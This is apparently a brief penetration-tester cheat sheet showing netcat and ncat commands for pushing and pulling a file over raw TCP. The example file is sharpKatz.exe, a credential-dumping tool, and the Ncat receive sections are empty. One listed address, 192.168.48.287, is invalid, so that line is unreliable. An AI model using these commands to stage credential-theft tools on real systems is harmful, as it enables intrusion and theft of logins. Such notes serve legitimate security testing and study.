githubEdit

nc-and-ncat

NC

Send file

nc -q 0 192.168.2.16 8000 < sharpKatz.exe

Sending file as input

sudo nc -l -p 443 -q 0 < sharpKatz.exe

Receive file

nc -l -p 8000 > sharpKatz.exe

Receive file as input

nc 192.168.48.287 443 > sharpKatz.exe

Ncat

Send file

ncat --send-only 192.168.39.3 8000 < sharpKatz.exe

Sending file as input

sudo ncat -l -p 443 --send-only < sharpKatz.exe

Receive file

Receive file as input

Last updated